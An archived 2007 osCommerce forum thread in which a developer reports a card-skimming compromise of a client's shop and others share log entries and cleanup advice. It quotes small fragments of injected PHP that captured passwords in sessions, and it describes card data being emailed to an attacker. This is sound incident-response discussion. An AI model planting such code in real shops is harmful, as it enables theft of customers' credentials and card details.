Trimast Posted October 8, 2007 Share Posted October 8, 2007 Hi All, Where to start! I've a client that uses the protx form payment method and have been doing so for 12 months. I had a call from them this morning, saying one of their customers had entered their credit card details into the payment form on the site and then been redirected to protx. On investigation i've found that somehow (not quite sure yet still investigating) the protx form has been changed to take credit card details on the site in a totally unsecure way, then send the customer to protx for further payment. Upon further investigation, i've found a number of files have appeared on the server within the catalog/images folder: cvv.html yzx.txt two image files for mastercard and amex Additionally, the following files within catalog/ have all been modified: index.php create_account.php login.php tell_a_friend.php Each modified file contains the following: // da edit xong The login file contains this code at line 26: $password123 = $password; session_unregister("password123"); session_register("password123"); // da edit xong Create account Contains around line 55: $password123 = $password; session_unregister("password123"); session_register("password123"); // da edit xong The index file contains: $td_query = tep_db_query("UPDATE `configuration` SET `configuration_value` = 'true' where `configuration_key` = 'ACCOUNT_DOB'"); at the bottom of the file. Tell a Friend The Tell a Friend file however is of most concern as this file has been modified to allow the hacker to upload other modified files. My belief is that the tell a friend file was the first to be modified and then the hackers use this file to do their work, via uploading the other files. -- As far as i can ascertain no other files have been modified / hacked. If this is new to the community then everybody needs to be aware as these people must know their way around OSC and which files to exploit. My entire internal network is now undergoing a major security sweep to establish whether they got access via a malware application on one of our systems. We are also speaking with the hosting company to establish whether there have been any security breaches on the server. If anybody has experienced this before an knows if their is a security breach or "hole" within OSC then if they could let me know so i can close it all up. As soon, as i've established how the changes to the protx form have been made i'll update this post, incase somebody else is unfortunate enough to experience the same thing. Regards, Rob Link to comment Share on other sites More sharing options...
Hade Posted October 8, 2007 Share Posted October 8, 2007 Scary stuff. I wonder if they got in through OSC? What version are you running? 2.2 MS2? Read the forum rules... Link to comment Share on other sites More sharing options...
Trimast Posted October 8, 2007 Author Share Posted October 8, 2007 yes ms2.2 but wih loads of contributions. It is quite scarry - i've just spent 30 minutes on the phone with the solicitor!! Link to comment Share on other sites More sharing options...
Trimast Posted October 8, 2007 Author Share Posted October 8, 2007 Hi All, Just to post an update: After spending the past few hours going through each file, i've manged to find out that the hackers have also modified the catalog/checkout_confirmation.php page in a major way. They are basically now running a db query that extracts the customers details ie name, address, email, post code, date of birth etc combining this with the posted credit card details and then emailing these to a gmail address. I've still not been able to establish how they are able to add the Credit Card Details form into the Payment Page, however i've now deleted the entire shopping cart and will be re-installing the shop in due course. if anybody has any ideas as to how they've managed to do this and even more importantly a security fix i'd be delighted to know. Regards, Rob Link to comment Share on other sites More sharing options...
dougm Posted October 11, 2007 Share Posted October 11, 2007 I checked mine out and did not find this. I had some odd hacks earlier that looked like banking phishing scams. The hackers had somehow loaded fake bank websites and was directing them to my server to phish for account logins. I ended up reporting it to the server folks and then changing my passwords and deleting the fake sites. I am now dealing with a new one and can't figure out if this is a hack or robots or what but my FTP login keeps getting blocked from the server for security reasons and I noticed the event logs are filling up with hits like the following (hundreds of them): [Wed Oct 10 06:02:29 2007] [error] [client 66.249.65.46] File does not exist: /home/pcbizus/public_html/jacksonmadeleine/webstore/images/infobox//golden-vicary-privet.html [Wed Oct 10 05:59:47 2007] [error] [client 66.249.65.46] File does not exist: /home/pcbizus/public_html/jacksonmadeleine/webstore/images/infobox//unlock-lg-cell-phone.html As you can see they go to the osC webstore/images dir and start hitting it looking for something - what does the // do in the middle of the link? Link to comment Share on other sites More sharing options...
dougm Posted October 11, 2007 Share Posted October 11, 2007 I found that admin directory had the password protection disabled. I enabled it again also after changing the passwords again and found that the errors in the logs changed soon after.... hmmmm looks like hackers to me... [Thu Oct 11 01:12:50 2007] [error] PHP Warning: readfile(/home/pcbizus/public_html/jacksonmadeleine/webstore//images/corner_right.gif) [<a href='function.readfile'>function.readfile</a>]: failed to open stream: No such file or directory in /home/pcbizus/public_html/jacksonmadeleine/webstore/admin/file_manager.php on line 69 [Thu Oct 11 01:12:50 2007] [error] PHP Warning: readfile(/home/pcbizus/public_html/jacksonmadeleine/webstore//images/corner_left.gif) [<a href='function.readfile'>function.readfile</a>]: failed to open stream: No such file or directory in /home/pcbizus/public_html/jacksonmadeleine/webstore/admin/file_manager.php on line 69 [Thu Oct 11 01:12:50 2007] [error] PHP Warning: readfile(/home/pcbizus/public_html/jacksonmadeleine/webstore//images/arrow_right.gif) [<a href='function.readfile'>function.readfile</a>]: failed to open stream: No such file or directory in /home/pcbizus/public_html/jacksonmadeleine/webstore/admin/file_manager.php on line 69 [Thu Oct 11 01:07:51 2007] [error] [client 66.249.65.46] File does not exist: /home/pcbizus/public_html/jacksonmadeleine/webstore/images/infobox//quinceanos.html [Thu Oct 11 01:02:46 2007] [error] [client 66.249.65.46] File does not exist: /home/pcbizus/public_html/jacksonmadeleine/webstore/images/infobox//chery-pie.html [Thu Oct 11 00:57:43 2007] [error] [client 66.249.65.46] File does not exist: /home/pcbizus/public_html/jacksonmadeleine/webstore/images/infobox//kone-west.html Link to comment Share on other sites More sharing options...
dougm Posted October 11, 2007 Share Posted October 11, 2007 Looks like the culprit here is a google robot - 66.249.65.46. Nice. Link to comment Share on other sites More sharing options...
Trimast Posted October 11, 2007 Author Share Posted October 11, 2007 Hi dougm, My reading of what you have indicated is that google was / is actually spidering these hacker pages and if you've removed them then they can no longer be found or the // is sending them to a directory that does not exist - but this normally ignores the second / so image//infobox/image.gif would be the same as images/infobox/images.gif. Normally the // indicates that there is a missing directory between the two //, that is the only time i've ever encountered it and that is normally during the debugging of a script i've written, but it normally only affects things when you are using the full path and not a url. I'd check all of the files that you've mentioned, and the two directories to check for any files that do not look right - download them to a new folder and then open them up in what ever web development software you use and check them, then delete them if they've been compromised and replace them with your original files (check them too first for compromise). More importantly have you established how they got in in the first place? Rob Link to comment Share on other sites More sharing options...
disp507 Posted October 11, 2007 Share Posted October 11, 2007 Hi dougm, My reading of what you have indicated is that google was / is actually spidering these hacker pages and if you've removed them then they can no longer be found or the // is sending them to a directory that does not exist - but this normally ignores the second / so image//infobox/image.gif would be the same as images/infobox/images.gif. Normally the // indicates that there is a missing directory between the two //, that is the only time i've ever encountered it and that is normally during the debugging of a script i've written, but it normally only affects things when you are using the full path and not a url. I'd check all of the files that you've mentioned, and the two directories to check for any files that do not look right - download them to a new folder and then open them up in what ever web development software you use and check them, then delete them if they've been compromised and replace them with your original files (check them too first for compromise). More importantly have you established how they got in in the first place? Rob Do either of you have access to the web server logs them selves? That might help lead you to the source of the intrusion. Depending on the level of logging configured you might be able to even get a hit at where the attacker came from. - Jim Link to comment Share on other sites More sharing options...
porpoise1954 Posted October 11, 2007 Share Posted October 11, 2007 Hi All, Just to post an update: After spending the past few hours going through each file, i've manged to find out that the hackers have also modified the catalog/checkout_confirmation.php page in a major way. They are basically now running a db query that extracts the customers details ie name, address, email, post code, date of birth etc combining this with the posted credit card details and then emailing these to a gmail address. I've still not been able to establish how they are able to add the Credit Card Details form into the Payment Page, however i've now deleted the entire shopping cart and will be re-installing the shop in due course. if anybody has any ideas as to how they've managed to do this and even more importantly a security fix i'd be delighted to know. Regards, Rob That's one of the main reasons we don't even collect that data, let alone store it. We leave that to our third party payment solution provider - let them take the risk! * * * * * * * * * * * * * * * * * * * * * Porpoises are most happy when wet! \ _ \ _ \ _ \ _ \ _ \ _ \ _ \ _ \ _ \ _ \ _ \ _ Link to comment Share on other sites More sharing options...
Trimast Posted October 11, 2007 Author Share Posted October 11, 2007 My server log files are changed every 24 hours so i've not been able to use those unfortunately - they were the first things i asked for though, but no joy. As for storing CC details if we do then we only store 8 digits randomly selected as per a sequence agreed with the client and then encrytped using a random key only know to the client - not even i know what the key is, the other 8 digits are then emailed as a block and the customer then matches them up as per the agreed sequence. It does work well, as you need to know the exact sequence code and the random key, but where possible i prefer to send payments to a protx or worldpay that way i don't have to worry about these things too much!! Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.